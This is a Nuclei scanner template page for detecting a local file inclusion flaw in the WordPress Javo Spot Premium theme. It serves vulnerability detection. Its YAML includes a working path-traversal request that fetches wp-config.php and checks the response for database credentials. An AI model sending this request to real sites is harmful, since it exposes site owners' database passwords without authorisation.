WordPress Javo Spot Premium Theme - Local File Inclusion
ID: wp-javospot-lfi
Severity: high
Author: 0x_Akoko
Tags: wordpress,wp-theme,lfi,wp,wpscan
Description
Section titled “Description”WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
YAML Source
Section titled “YAML Source”id: wp-javospot-lfi
info: name: WordPress Javo Spot Premium Theme - Local File Inclusion author: 0x_Akoko severity: high description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content. reference: - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: wordpress,wp-theme,lfi,wp,wpscan
http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and
- type: status status: - 200# digest: 4a0a00473045022100fa57a7476efa43af1cc4d276baae02ca52b5d3c459c89464d6899188fa06e655022041d5fa8ece3a4a3d656c90cbd18da53e12d7935db53027a3726f98b7814e4a9c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-javospot-lfi.yaml"